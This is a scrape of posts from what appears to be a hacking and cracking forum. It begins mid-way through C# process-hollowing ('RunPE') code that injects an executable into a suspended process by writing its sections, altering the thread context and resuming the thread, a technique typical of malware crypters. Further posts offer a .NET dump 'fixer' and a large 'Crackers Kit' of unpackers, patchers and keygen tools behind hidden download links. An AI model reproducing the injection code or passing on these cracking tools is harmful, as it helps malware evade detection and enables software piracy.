lpNumberOfBytesWritten); int num5 = num - 1; for (int i = 0; i { int[] mzt = new int[10]; Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), mzt, 0, 40); byte[] buffer2 = new byte[(mzt[4] - 1) + 1]; Buffer.BlockCopy(bytes, mzt[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length); addr = new IntPtr(buffer2.Length); sz = new IntPtr(naddr.ToInt32() + mzt[3]); WPM(processInfo[0], sz, buffer2, (uint)addr, out lpNumberOfBytesWritten); } sz = new IntPtr(ctxt[0x29] + 8L); addr = new IntPtr(4); int nInt = naddr.ToInt32(); byte[] bN = BitConverter.GetBytes(Convert.ToUInt32(nInt)); Int64 i6 = addr.ToInt64(); uint u = (uint)0; WPM(processInfo[0], sz, bN, u, out lpNumberOfBytesWritten); ctxt[0x2c] = (uint)(naddr.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40)); STC(processInfo[1], ctxt); } } RT(processInfo[1]); } } catch { return false; } return true; } } [/HIDE-THANKS]
      23. 1 point
        Universal Fixer fix dumps after dumping them whit Dotnet Dumper or other similiar tools and will also fix nasty things: multiple assembly/module definitions, wrong extends, etc. [hide][Hidden Content]]
      24. 1 point
        Crackers Kit Collection, 3 Kits in One...updated...enjoy included are the following: CrackersKit v2.0 CrackersKit 2005 DarkCode CrackersKit --------------------------------------------------------------------- CrackersKit v2.0: Analysis : · OllyDbg 1.10 & Plugins - Modified by SLV *NEW* · W32Dasm 8.93 - Patched *NEW* · PEiD 0.93 + Plugins *NEW* · RDG Packer Detector v0.5.6 Beta - English *NEW* Rebuilding : · ImpRec 1.6 - Fixed by MaRKuS_TH-DJM/SnD *NEW* · Revirgin 1.5 - Fixed *NEW* · LordPE De Luxe B *NEW* Packers : · FSG 2.0 · MEW 11 1.2 SE · UPX 1.25 & GUI *NEW* · SLVc0deProtector 0.61 *NEW* · ARM Protector v0.3 *NEW* · WinUpack v0.31 Beta *NEW* Patchers : · dUP 2 *NEW* · CodeFusion 3.0 · Universal Patcher Pro v2.0 · Universal Patcher v1.7 *NEW* · Universal Loader Creator v1.2 *NEW* · aPatch v1.07 · PMaker v1.2.0.0 *NEW* · Tola's Patch Engine v2.03b · ABEL Loader v2.31 · Yoda's Process Patcher *NEW* · Registry Patch Creator *NEW* · ScAEvoLa's PatchEngine v1.33 *NEW* · Dogbert's Genuine Patching Engine v1.41 *NEW* · Graphical-PatchMaker v1.4 *NEW* · The aPE v0.0.7 BETA *NEW* · Liquid2 *NEW* · PELG v0.3 *NEW* · PrincessSandy v1.0 *NEW* HEX Editor : · Biew v5.6.2 · Hiew v7.10 *NEW* · WinHex v12.5 *NEW* Decompilers : · DeDe 3.50.04 · VB ?Decompiler? Lite v0.4 *NEW* · Flasm Unpackers : · ACProtect - ACStripper · ASPack - ASPackDie · ASProtect > Stripper 2.07 Final & Stripper 2.11 RC2 *NEW* · DBPE > UnDBPE · FSG 1.33 > Pumqara's Dumper · FSG 2.00 > UnFSG · MEW > UnMEW · PeCompact 1.x > UnPecomp · PEncrypt > UnPEncrypt · PeSpin 0.3 > DeSpinner 0.3 · tELock 0.98-1.0 > UntELock · EXEStealth > UnStealth · Xtreme-Protector / Themida > XprotStripper v1.1 *NEW* · Morphine Killer 1.1 by SuperCracker/SND *NEW* · ASPR Dumper v0.1 *NEW* · Armadillo Process Detach v1.1 *NEW* · Armadillo Dumper v1.0 *NEW* · Armadillo Nanomite Fixer *NEW* · Armadillo Distance Decryptor aka Jump Table Fixer *NEW* · ArmTools (Translated!) *NEW* · ArmInline v0.1 *NEW* · Quick Unpack v1.0b3 *NEW* · Procdump v1.6.2 *NEW* Keygenning : *NEW* · TMG Ripper Studio 0.02 *NEW* Other : · FileMon v7 (Patched) *NEW* · RegMon v7 (Patched) *NEW* · RSATool 2 · DAMN HashCalc · EVACleaner 2.7 · Process Explorer · Resource Hacker · PUPE 2002 · PointH Locator *NEW* · ASPR CRC Locator 1.2 *NEW* · PE Tools 1.5 RC5 *NEW* · API Address Finder *NEW* · Jump to Hex Convertor *NEW* · PE GeNeRaToR 1.2.1 *NEW* · Quick File Viewer v1.0.1 *NEW* · PE Insight 0.3b *NEW* · Crypto Searcher *NEW* · PE Editor v1.7 *NEW* · bkslash's Inline Patcher *NEW* · Stud_PE v2.1 *NEW* · Injecta v0.2 *NEW* · PE Rebuilder v0.96b *NEW* · PE Optimizer v1.4 *NEW* · ToPo v1.2 *NEW* · NFO Builder 2000 v1.02 *NEW* · NFO File Maker v1.6 *NEW* · TMG NFOmakeR v1.0 *NEW* · hCalc *NEW* Download :[Hidden Content] password :
      25. 1 point
        add >using System.Diagnostics; code: > private void button1_Click(object sender, EventArgs e) { string str = @"C:\windows\notepad.exe"; Process process = new Process(); process.StartInfo.FileName = str; process.Start(); }